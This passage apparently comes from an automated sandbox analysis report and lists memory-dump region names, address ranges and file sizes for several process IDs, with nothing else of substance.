                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-89-0x00000000743D0000-0x00000000743F5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          148KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-63-0x0000000074400000-0x000000007444B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          300KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-91-0x0000000071750000-0x00000000718EE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-92-0x0000000071680000-0x0000000071743000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          780KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-93-0x0000000074100000-0x000000007412D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-65-0x00000000743D0000-0x00000000743F5000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          148KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-95-0x00000000708B0000-0x0000000070F01000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-57-0x00000000757C1000-0x00000000757C3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-62-0x0000000071990000-0x000000007220A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-58-0x00000000737A0000-0x0000000073D4B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5.7MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-59-0x0000000072CA0000-0x0000000073798000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          11.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-60-0x0000000072500000-0x0000000072C9C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/760-61-0x0000000074450000-0x00000000744D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          516KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/836-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/848-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/852-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/908-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/968-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/968-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/992-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1000-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1060-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1060-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1120-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1140-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1140-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1144-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1224-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1288-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1288-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1288-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1352-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1380-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1380-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1444-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1444-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1508-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1516-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1528-54-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1532-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1556-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1572-56-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1584-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1604-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1616-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1640-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1644-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1656-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1676-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1676-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1680-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1720-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1720-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1744-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1748-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1760-97-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1784-105-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1784-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1800-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1808-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1820-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1864-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1904-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1932-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1944-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1984-84-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2020-161-0x0000000000000000-mapping.dmp